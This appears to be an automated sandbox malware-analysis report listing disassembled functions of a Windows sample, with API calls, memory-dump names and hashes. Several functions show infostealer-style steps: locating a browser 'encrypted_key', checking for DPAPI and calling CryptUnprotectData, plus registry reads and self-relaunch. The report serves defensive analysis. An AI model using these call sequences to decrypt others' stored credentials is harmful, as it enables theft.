                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: 4b8f8ef4bbb02537e2a08bec031a9cb7c9545b5d6695775640c24baec4593aab
                                                            • Instruction ID: 859b19145a4cab68083e885f6012a14bfa7adefa07a9cde85955a1717be3dc3a
                                                            • Opcode Fuzzy Hash: 4b8f8ef4bbb02537e2a08bec031a9cb7c9545b5d6695775640c24baec4593aab
                                                            • Instruction Fuzzy Hash: CF518CB5A4420AEFCB08DF94D495AAE77B5FF48304F108469E902AB390D734EA95CFD1
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                              • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                              • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                              • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                              • Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                              • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                              • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
                                                              • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                                                              • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                                                              • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                                                              • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00739D92
                                                              • Part of subcall function 00739B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
                                                              • Part of subcall function 00739B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                                                              • Part of subcall function 00739B60: memcpy.MSVCRT(?,?,?), ref: 00739BC6
                                                              • Part of subcall function 00739B60: LocalFree.KERNEL32(?), ref: 00739BD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                            • String ID: $"encrypted_key":"$DPAPI
                                                            • API String ID: 3731072634-738592651
                                                            • Opcode ID: feb0062dd1aebe0321dd923372cfeb98395ec204548e2a7443d601045a8bdeae
                                                            • Instruction ID: 89c10a49a42407b4d777f0f547886758394e30659d8c816b0c119b1f788c7976
                                                            • Opcode Fuzzy Hash: feb0062dd1aebe0321dd923372cfeb98395ec204548e2a7443d601045a8bdeae
                                                            • Instruction Fuzzy Hash: 8F3143B5E10109EBDF04DFE4DC86AEE77B8BF48305F144519EA05A7242E7789A04CBA1
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E28,00000000,?), ref: 0074882F
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00750E28,00000000,?), ref: 00748836
                                                            • wsprintfA.USER32 ref: 00748850
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                                            • String ID: Fs$%dx%d
                                                            • API String ID: 2716131235-1170756869
                                                            • Opcode ID: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                                                            • Instruction ID: 8fd6ee9cf941b69272b4f7535935de876aea908a5dd703f80f5b78b9d81496f0
                                                            • Opcode Fuzzy Hash: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                                                            • Instruction Fuzzy Hash: 042145B2E54204AFDB04DFD4DD45FAEB7B8FB48701F104159F509A7280C7795940DBA2
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747E37
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00747E3E
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00FC81F8,00000000,00020119,?), ref: 00747E5E
                                                            • RegQueryValueExA.ADVAPI32(?,00FD05F0,00000000,00000000,000000FF,000000FF), ref: 00747E7F
                                                            • RegCloseKey.ADVAPI32(?), ref: 00747E92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                                                            • Instruction ID: 565838a3f15e9f8a2e4cf7f7572c4596fc484d35a4b6abe0e6d492e9db489cdb
                                                            • Opcode Fuzzy Hash: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                                                            • Instruction Fuzzy Hash: AC119EB2A48205EBD714CF94DC49FBFBBB8FB44B01F104259FA09A7280D7785800DBA2
                                                            APIs
                                                            • StrStrA.SHLWAPI(00FD0078,?,?,?,0074140C,?,00FD0078,00000000), ref: 0074926C
                                                            • lstrcpyn.KERNEL32(0097AB88,00FD0078,00FD0078,?,0074140C,?,00FD0078), ref: 00749290
                                                            • lstrlenA.KERNEL32(?,?,0074140C,?,00FD0078), ref: 007492A7
                                                            • wsprintfA.USER32 ref: 007492C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpynlstrlenwsprintf
                                                            • String ID: %s%s
                                                            • API String ID: 1206339513-3252725368
                                                            • Opcode ID: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                                                            • Instruction ID: 3318c50862d2f62da51926661aedd7bbecff27418c6c1c34f0c499409a5b56f2
                                                            • Opcode Fuzzy Hash: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                                                            • Instruction Fuzzy Hash: E401A976504208FFCB04DFE8C984EAE7BB9EB84365F108148F9099B204C675AA40DBD5
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007312B4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 007312BB
                                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007312F5
                                                            • RegCloseKey.ADVAPI32(?), ref: 007312FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                                                            • Instruction ID: 35661ef61d7ec6be0127a40ad5e4a03b931feae88d6c7f610b25dc2ef12b2b0d
                                                            • Opcode Fuzzy Hash: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                                                            • Instruction Fuzzy Hash: C70131BAA54208BBDB04DFE0DC49FAEB7B8EB88701F008159FA0997280D6749A419F51
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0074C74E
                                                              • Part of subcall function 0074BF9F: __getptd_noexit.LIBCMT ref: 0074BFA2
                                                              • Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF
                                                            • __getptd.LIBCMT ref: 0074C765
                                                            • __amsg_exit.LIBCMT ref: 0074C773
                                                            • __lock.LIBCMT ref: 0074C783
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0074C797
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 74eeb44bc61d54189d7a6665a1ee94a090e5dc8f65fdab6d29781637e1d898ee
                                                            • Instruction ID: 2c660ba57e39ae4b0542892c7361bf7cab499245b4efcb49177c863d19a47d43
                                                            • Opcode Fuzzy Hash: 74eeb44bc61d54189d7a6665a1ee94a090e5dc8f65fdab6d29781637e1d898ee
                                                            • Instruction Fuzzy Hash: 3DF0B432946300EBD763BBB8580B79E33A06F00721F248149F404A61D2DB6C9D448E5A
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD5B0), ref: 0074079A
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD8A0), ref: 00740866
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD7B0), ref: 0074099D
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_t
                                                            • API String ID: 3722407311-3722307212
                                                            • Opcode ID: 7c86f35e21359733f8dbeac210af3b0b154ec13c79217c99e0d564c0c6195f61
                                                            • Instruction ID: 9dddedcdc9a7854702ff1bc50410bde9a0eb63d0e1251ad671404e412c37c1a2
                                                            • Opcode Fuzzy Hash: 7c86f35e21359733f8dbeac210af3b0b154ec13c79217c99e0d564c0c6195f61
                                                            • Instruction Fuzzy Hash: 49917975B10208EFDB28EF64D995BED77B9FF94300F408519E8099F252DB34AA05CB92
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD5B0), ref: 0074079A
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD8A0), ref: 00740866
                                                            • StrCmpCA.SHLWAPI(00000000,00FCD7B0), ref: 0074099D
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_t
                                                            • API String ID: 3722407311-3722307212
                                                            • Opcode ID: 346800918303e45537a7213e0aaed1723c3c4a49e692c3292cedfaad720ecfa3
                                                            • Instruction ID: d43414390f248d4e268f0ac4bcd915ccd8544247892f55ae494773a3f87d9d4e
                                                            • Opcode Fuzzy Hash: 346800918303e45537a7213e0aaed1723c3c4a49e692c3292cedfaad720ecfa3
                                                            • Instruction Fuzzy Hash: 3C816975B10208EFDB28EF64D995EEDB7B5FF94300F508519E8099F251DB34AA05CB82
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00746663
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00746726
                                                            • ExitProcess.KERNEL32 ref: 00746755
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                            • String ID: <
                                                            • API String ID: 1148417306-4251816714
                                                            • Opcode ID: 1ce441b0fba41737ec56b59a577a5d5a1c19ffa881d9e5687baaf51af0465587
                                                            • Instruction ID: 2a9ae30dd6e8d55f1be46abb08b92907c9ac49bb0a70e3435452fecddbb71802
                                                            • Opcode Fuzzy Hash: 1ce441b0fba41737ec56b59a577a5d5a1c19ffa881d9e5687baaf51af0465587
                                                            • Instruction Fuzzy Hash: D2314DB2C51208EADB15EB50DC86BDD777CAF44300F404198F20966191DF786B88CF56
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,@Jns,@Jns), ref: 00736C9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: @Jns$Jns$Jns
                                                            • API String ID: 544645111-146087769
                                                            • Opcode ID: fb81248735e357c01c2332430a8562bcd9fed5229d2ad1b32439689558a26981
                                                            • Instruction ID: e276254814f41b11fb0101c271e45d485fadffff9c072bf8c05f8025d13bb6a5
                                                            • Opcode Fuzzy Hash: fb81248735e357c01c2332430a8562bcd9fed5229d2ad1b32439689558a26981
                                                            • Instruction Fuzzy Hash: 4821E974A05208EFEB04CF89C594BADBBB1FF48305F10C199D599AB342D739AA81DF91
                                                            APIs
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                            • lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
